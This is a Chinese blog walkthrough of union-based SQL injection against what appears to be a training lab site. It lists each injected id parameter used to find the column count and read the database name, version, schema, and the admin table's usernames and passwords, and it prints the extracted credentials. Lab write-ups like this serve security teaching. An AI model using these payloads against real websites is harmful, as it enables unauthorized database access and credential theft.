首页 > 数据库 >为了女神小芳(sql注入)

为了女神小芳(sql注入)

时间:2023-08-23 15:22:42浏览次数:42  
标签:女神 union 构造 admin limit sql 小芳 id select

靶机链接:http://pu2lh35s.ia.aqlab.cn/

打开链接后是一个猫舍的web

 点击“点击查看新闻1”后跳转到新的域名:http://pu2lh35s.ia.aqlab.cn/?id=1

 看到域名“http://pu2lh35s.ia.aqlab.cn/?id=1”含有“/?id=1”,猜测存在sql注入漏洞。验证猜测

构造“?id=1 and 1=1”或“?id=1=1”,访问

 可以看到,页面返回正常。构造“?id=1 and 1=2”或“?id=1=2”,访问

 可以发现页面返回异常。初步判定,这里存在sql注入漏洞的可能性很大

判断字段数

构造“?id=1=1 order by 1”并访问。

 页面返回正常。构造“?id=1=1 order by 2”,访问

 页面返回正常。再次构造“?id=1=1 order by 3”、访问

 页面返回异常,至此能判断出字段数为2

回显点判断

构造“?id=1=1 union select 1,2”、访问

 页面返回正常,再次构造“?id=1=2 union select 1,2”,访问

 页面返回异常,并且图中红框处显示出“2”。此现象代表此网站切实存在sql注入漏洞,并且可以通过构造字段,在红框处体现出我们想要获得的信息

查询想要得知的内容

构造“/?id=1=2 union select 1,database()”,查询数据库名称

 可以查到当前数据库的名字为“maoshe”。

构造“?id=1=2 union select 1,version()”获取数据库版本信息

 查询到数据库的版本信息为“5.5.53”

构造“?id=1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1”获取数据库表名

 查询到数据库的表名为“admin”。*****此“admin”为数据库的表名,并非用户名******

大部分情况下而言,管理员的账号密码信息都会在“admin”表中

分别构造字段,查询admin表中的内容

“?id=1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1”

“?id=1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1”

 

“?id=1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1”

 由以上构建的字段可以查出“admin”表中含有的字段有“ID”、“useradmin”、“password”

查询“username”字段的内容

 构造“?id=1=2 union select 1,username from admin%20 limit 0,1”

获得第一个用户名“admin”

构造“?id=1=2 union select 1,username from admin%20 limit 1,1”

 获得第二个用户名“ppt领取微信”

构造“?id=1=2 union select 1,username from admin%20 limit 2,1”

 查询到内容为空,代表“username”中只包含两个用户名信息:“admin”和“ppt领取微信”

查询“password”字段的内容

构造“?id=1=2 union select 1,password from admin%20 limit 0,1”查询“password”字段信息

查询到第一个密码为“hellohack”

构造“?id=1=2 union select 1,password from admin%20 limit 1,1”查询“password”字段信息

 查询到第二个密码为“zkaqbanban”

构造“?id=1=2 union select 1,password from admin%20 limit 2,1”查询“password”字段信息

  查询到内容为空,代表“password”中只包含两个信息:“hellohack”和“zkaqbanban”

至此,两对账户、密码信息已经获得,分别为:“admin/hellohack”和“ppt领取微信/zkaqbanban”

 

 

如果是数据库大白的话,建议先学一学数据库知识,最起码的要能够知道基础的命令含义、格式等再考虑SQL注入!!!

标签:女神,union,构造,admin,limit,sql,小芳,id,select
From: https://www.cnblogs.com/sawyerhan/p/17651564.html

相关文章

  • 【腾讯云 TDSQL-C Serverless 产品体验】 使用 Python 向 TDSQL-C 添加读取数据 实现
    前言TDSQL-CMySQL版(TDSQL-CforMySQL)是腾讯云自研的新一代云原生关系型数据库。融合了传统数据库、云计算与新硬件技术的优势,为用户提供具备高弹性、高性能、海量存储、安全可靠的数据库服务。TDSQL-CMySQL版100%兼容MySQL5.7、8.0。实现超百万级QPS的高吞吐,最高PB级智......
  • 直播网站源码,mysql,mariadb 密码忘记,修改密码
    直播网站源码,mysql,mariadb密码忘记,修改密码两种修改方法: 1、直接在shell命令行使用mysqladm命令修改。 #mysqladmin-uroot-poldpasswordpasswordnewpassword ​这种方法的弊端在于会明文显示密码。2、登陆数据库修改密码。 #mysql-uroot-p  2.1更新......
  • sql server
    sqlserver删除数据后,磁盘空间反而增大?压缩数据库及删除数据库表的方法比较https://www.cnblogs.com/keeplearningandsharing/p/15874092.htmlSQLServer大表如何快速删除数据https://www.codenong.com/cs105781276/......
  • GIS开发与应用(PostgreSQL空间数据库各种查询语句范例以及SQL语句查询空间关系)_postgre
    实验二PG空间数据库应用实验目的:实验准备实验内容及要求实验过程及步骤:1、创建空间数据库nyc,在nyc空间数据库中创建geometries表,对表中插入Point、Linestring、Polygon、PolygonWithHole、collection等几何要素。2、查看geometries表中的几何图形的元数据。使用`ST_G......
  • Placement Rules in SQL 使用案例
    作者:WalterWj使用背景为了减少跨机房流量使用,可以将一些不重要表设置为3副本且固定在主机房。拓扑确定使用非功能测试环境做测试,先确认当前拓扑:默认一共5副本,当前3副本会放在rack1/2/4,2副本放在rack3/5使用方法创建test.pr表Createtablepr(idintprimary......
  • mac卸载mysql教程(按照步骤可完全卸载)
    1、关闭mysql系统偏好设置-点击mysql图标-点击stop...或者查看mysql是否启动:ps-ef|grepmysql输入:kill-9 然后回车,关闭mysql2、卸载:在Mac终端使用下面的命令删除所有mysql文件即可sudorm/usr/local/mysqlsudorm-rf/usr/local/mysql*rm-rf/Library/Startu......
  • mysql超出最大连接数解决方法
    遇到mysql超出最大连接数,相信不少人第一反应就是查看mysql进程,看有没有慢查询,当然这个做法是完全正确的!但是很多时候真正的问题不在这里。今天有遇到同样的问题,一味查看mysql进程和慢查询日志,无果。后来老大提点了一下,查看一下nginx日志,发现有一两个访问执行时候比较长,然后使用top......
  • 千万级数据深分页查询SQL性能优化实践 | 京东云技术团队
    一、系统介绍和问题描述如何在Mysql中实现上亿数据的遍历查询?先来介绍一下系统主角:关注系统,主要是维护京东用户和业务对象之前的关注关系;并对外提供各种关系查询,比如查询用户的关注商品或店铺列表,查询用户是否关注了某个商品或店铺等。但是最近接到了一个新需求,要求提供查询关注对......
  • 千万级数据深分页查询SQL性能优化实践
    一、系统介绍和问题描述如何在Mysql中实现上亿数据的遍历查询?先来介绍一下系统主角:关注系统,主要是维护京东用户和业务对象之前的关注关系;并对外提供各种关系查询,比如查询用户的关注商品或店铺列表,查询用户是否关注了某个商品或店铺等。但是最近接到了一个新需求,要求提供查询关注......
  • 3、oracle迁移到postgres-执行动态sql传参不同
    目录oracle迁移到postgres-执行动态sql传参不同1、oracle使用的是:12、postgres使用的是$1oracle迁移到postgres-执行动态sql传参不同在sql字符串中,会动态传入值,使用阿拉伯数据定义传参的个数。1、oracle使用的是:1executeimmediate'select*fromsys_stuwherestu_name=......